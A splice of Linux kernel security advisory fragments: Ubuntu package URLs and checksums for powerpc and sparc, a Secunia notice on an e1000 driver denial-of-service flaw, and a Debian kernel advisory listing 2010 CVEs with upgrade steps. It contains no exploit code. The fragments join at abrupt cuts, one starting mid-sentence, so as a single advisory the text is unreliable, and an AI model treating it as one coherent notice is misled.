http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    53128 e1b19e86e96b2a705f52257d0ba3e446\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    96780 69931c2ff42e93b841cbc39040b5f30b\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   109864 55530222d62b149471f8f7ec0a0b401c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    41000 e504306368b70e7b1d4080fb9f104774\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    40386 867836bfd128cb699b6084d22ae5b9ba\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   598544 7c74713ce524ca6056f98b948ba1009d\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   631378 f6d7ccfc08940e0f182d7c347aa6fe1b\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   155250 5e58765f9014ac1b91db52377be3214e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   150514 1c673dcbb00b8bdb03c140e2c16c1c0b\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   106286 f66ae752322b3a80afd81acce9678c54\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   110218 b81a7936f5d028e6e2d1b0c66ec67a82\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   418794 7614b2ba143ebc43a4df17d3a553f07c\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   355170 c461e16d2638bbd922ba08faa3aadb1f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  4184440 fcf9a52cf7d828353fc20fc42f04074e\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  5568942 e1244e4847aa34cefffd29c5e69d17da\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5:   834094 d2a5a47fe19b15efcbade3a458886100\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5:   853586 41d8ab0b3bac34b9ef18b3bd1751c06a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb\n      Size/MD5:   834092 e1e2aa29e1424aef7ee116b1aa782e44\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5: 27690922 d93d95c548c34b5632bddc5f69e7c400\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5: 28531758 631a3347cb263b30bbac36ecfc73b928\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb\n      Size/MD5: 27421200 9068bbc77af845ca5b609d63bacd3308\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_powerpc.deb\n      Size/MD5:   760646 0e4b57d343052f30433529cbe14385ab\n    http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb\n      Size/MD5:   196496 08665e49676e012315b941d37f838812\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   289406 e171a625ccdacd6709fee1c6e116e3bf\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   310398 ac3b6dacc77e4002ca825e265bbedea2\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   221150 6a0092ae1be40ca9ee127b2232d15cb0\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   223804 af7ba0faf09abaf57945a5e7fc2ee506\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    31938 5101007b3b2c9c45eb839952ff705786\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    36496 5dbc40f2acca40498c173d0886f9c2fb\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   343926 8c91a96bd0c3c6cc134532d13fd3d37e\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   385810 4a30a8fe1a7d7c1367938575c185f169\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  2173120 cb265da97dfe62f146fd1fe41ebfc1f9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  2372824 8525c63c57d9345520be8210544f214c\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   223066 00121583edd924fe1757fa727ce876f3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   217338 72c2573434f500ed671fa00582074ca7\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   259842 55eca2948a90fd62fa2e4ff0a9af80c9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   296094 bfda8ec67edf7abd1478a60b126995ac\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   131886 ad03d7e0dbe804de4593e2fb86ebc4d0\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   154672 b67bb554dccec4c27d6accfbc97de8e4\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    50974 ee184ba015afebe43b7d67545684a609\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    45510 62e72d83114e691e6644f77328eae811\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   108060 869c7fefad265a86e620a08b85dccca2\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   123884 14b554ea470bda34e64f0d1df7fc6516\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    84352 1f3ffcebad40e4289c58fb81aec0855e\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    89956 8f8f82acc6aad562a95d254c5fac022c\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    77236 e74748e50bc049e1ca8abd0babfcae76\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    28408 34f21190bd3bbd99cbcd25074d41faaa\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:     8958 91a68cc7a6fe6edf7ac0be03e165b4da\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    10186 b4b821de875ffd8607a5f867f42854cc\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    62110 8194a3936a0ec9bbdc1866f8201d7015\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    72518 009ef857c62f697f9ee69284634b274f\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   106886 da2d5917ae498c3078ebbd70ff3da14b\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   136600 e6165d5923d6aefd3f3398010ee23694\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  1648486 4f570da059c50025d135c0e3f75ccd5e\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  1575088 c836ac8e48f8d71fabddbba3b950c198\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    78218 eddd03eab6e34af5a232892afc3bca0a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    83474 0ef56c605b39df3e5edfb67682ae2c06\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    17454 c7dbbca300fc48245cd4cfcf51d5b35d\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    18520 94418ced4448d327ec47dc602c17241a\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    67940 7a38341b4bc2c79511068590fc302c01\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    80278 e54c3d70347bae3108d67b1bc2bc4516\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   152200 1dc38fce24ffad9be140b3948e356e05\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   159704 c78e3cd87f71f9a728004fd7e546cb50\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    22518 a83c7b1e9ffa2a3660bb41fbd3fcbaca\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    25778 b7471dba3ec7b8c05d5ea5739933fe93\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   146488 3b7be44529c4cc86514657ac7b12b12b\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    71440 aad8b8756f92832f4febd71db1f966dd\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    47602 3db40ba1ebd556f46b88da6dbed5c5d3\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    98038 101ce2471c33a479cf85df2b2e2c5211\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   591060 cf8fb919251529d57a1f318311b3707a\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   151664 20c364a8b683a0c4ba27567503cf5296\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    99356 e0c14c26cb974c7825f345cd70429841\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  3186134 44a50ae97caf252433b0ecfac295ec59\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb\n      Size/MD5:   652300 cd39dcccee9c7a771274cdf208530af6\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb\n      Size/MD5:   651290 f71657ec5a90274fe87615325f631740\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb\n      Size/MD5: 22598018 851cda52ff2ffdd88b0732c63f74b5c8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb\n      Size/MD5: 22149494 2e6f4fc8428d316ccf24367738ec4cdb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_sparc.deb\n      Size/MD5:   771020 0f4a6d78f1bfc4c66dec85397a1dfe38\n    http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb\n      Size/MD5:   198080 42b0b00c0a74c8f19e63959105f8312f\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   280878 fd57b5da83294769b64c507d1819bf0e\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   214702 5aacff2a187543bc7c03d401f68607be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    31894 37e7ede984e9a95085fef957bd24f9d3\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   337020 a60a63332965ca2e7eb04b9e5af55555\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  1765768 473b47001814ec3dcfe3f7d13b591ddf\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   246854 4fcf74412f97aaad8445b41a8568ed9d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   139988 d2f75d8b75b929fbf9220da8bdf7e589\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    39912 a365983317c1b3c4dda94e11903aff3b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   206902 462e5550a90007c8c5418938dd676f6b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:     9178 c9f2992677c044041a448845a7d38b11\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    64466 52cf00bc003b8b5701298fad5517731f\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   212946 fbbb948d246dbea1ce131546d8bf6c2e\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:  1272618 4aec314341cdc776f20508b90866f5ae\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    96624 f0995ec49806ff5ede44bd80ff510d6e\n    http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    17702 9eb7b43e2289a69f9dcd478a5dc8d754\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   208204 b7724ff354d34b60cf7e2c5f50e61637\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:   193306 12a8a53ca0ef921b491d73d2bc051f73\n    http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb\n      Size/MD5:    27206 6ae9400c4f74471e4b0baa8e12220191\n\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nLinux Kernel e1000 Driver Denial of Service Vulnerability\n\nSECUNIA ADVISORY ID:\nSA35265\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/35265/\n\nDESCRIPTION:\nA vulnerability has been reported in the Linux Kernel, which can be\nexploited by malicious people to cause a DoS (Denial of Service). \n\nThe vulnerability is caused due to an error in the\n\"e1000_clean_rx_irq()\" function in drivers/net/e1000/e1000_main.c. \n\nSOLUTION:\nFixed in the GIT repository. \nhttp://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10\n\nPROVIDED AND/OR DISCOVERED BY:\nNeil Horman\n\nORIGINAL ADVISORY:\nhttp://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n.  Fixes for\nCVE-2010-0419 caused failures when using KVM in certain situations. \n\nWe apologize for the inconvenience. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2009-4537\n\n    Fabian Yamaguchi reported a missing check for Ethernet frames larger\n    than the MTU in the r8169 driver. \n\nCVE-2010-0727\n\n    Sachin Prabhu reported an issue in the GFS2 filesystem. \n\nCVE-2010-1083\n\n    Linus Torvalds reported an issue in the USB subsystem, which may allow\n    local users to obtain portions of sensitive kernel memory. \n\nCVE-2010-1087\n\n    Trond Myklebust reported an issue in the NFS filesystem. This has an unknown\n    security impact. \n\nCVE-2010-1173\n\n    Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from\n    Codenomicon Ltd reported an issue in the SCTP subsystem that allows\n    a remote attacker to cause a denial of service using a malformed init\n    package. \n\nCVE-2010-1187\n\n    Neil Hormon reported an issue in the TIPC subsystem. \n\nCVE-2010-1437\n\n    Toshiyuki Okajima reported a race condition in the keyring subsystem. \n\nCVE-2010-1446\n\n    Wufei reported an issue with kgdb on the PowerPC architecture,\n    allowing local users to write to kernel memory. Note: this issue\n    does not affect binary kernels provided by Debian. The fix is\n    provided for the benefit of users who build their own kernels\n    from Debian source. \n\nCVE-2010-1451\n\n    Brad Spengler reported an issue on the SPARC architecture that allows\n    local users to execute non-executable pages. See the referenced Debian bug page for details. \n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-22lenny1. \n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux\npackages. \n\nThe following matrix lists additional source packages that were\nrebuilt for compatibility with or to take advantage of this update:\n\n                                             Debian 5.0 (lenny)\n     user-mode-linux                         2.6.26-1um-2+22lenny1\n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz\n    Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc\n    Size/MD5 checksum:     5778 713b8a3f2bc10816264a81c0a9eb7860\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz\n    Size/MD5 checksum:  7894925 86ecf2ca8808aea84b0af06317616a6c\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:   126228 be9c5c392a1ab0cf0a297063abf983f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  1764832 b0d63ac0b12a0679867b8b53bf4c3a54\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  2871892 c5c0e0d8ea193812566f9481e6ca8440\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum: 48764508 9a203c801fd068d282d1cbb11fbab68f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:  4627886 fe792ad0bcf2c9f8ac4bb496e9885a20\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb\n    Size/MD5 checksum:   110906 6ef2c4468e55570a3e571021299d4760\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   374304 046703c72d1bf6bcc81cb462e0f4d7ec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   372708 a6922d1de2035d2745d5ad56a6e38eb9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 28676342 687312e7cdf46a79c7c4b974cbe5b542\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:  3620318 4c7448f11e8a63ddec95b7ddaf6e9c02\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 29374588 452a568c8f74d69e3b7ba6e1685d4863\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   373176 fbda1e3fb70a213ee26ab4e0a5af16a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   110428 82fc153ba577607964e55ce0d5eba8a8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   110404 9e24c63932b52a18206f951f18438a90\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum:   760714 dbef4d63df60be4c54e5a8999b2f1203\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb\n    Size/MD5 checksum: 28661322 db654cfdd26ec48b75fbf73bae54d15b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   391290 529d0af88248eeb9db6c720147c3c9c9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  1809098 2119049dd7757d1a7aa9b0cb6d65a4e6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   753158 c06cd160c023755232e79c187b20a98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   391970 7e2145ea394dcbd739307b7cff343ffc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   387348 d76eb180fa81f742ee87d9524f3bc5a3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 20949852 a3c0bd81f9f9cc96d2e42521fb963fb9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:  3757248 db362b7459220059221418a2b1542659\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110338 19ec7c8ca6e51c0a93352a059f9d5df8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum: 19315990 c185e17d0ca1ed640106dbb828c919f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb\n    Size/MD5 checksum:   110374 0e703e2b4306ca1e68cc61460ef86686\n  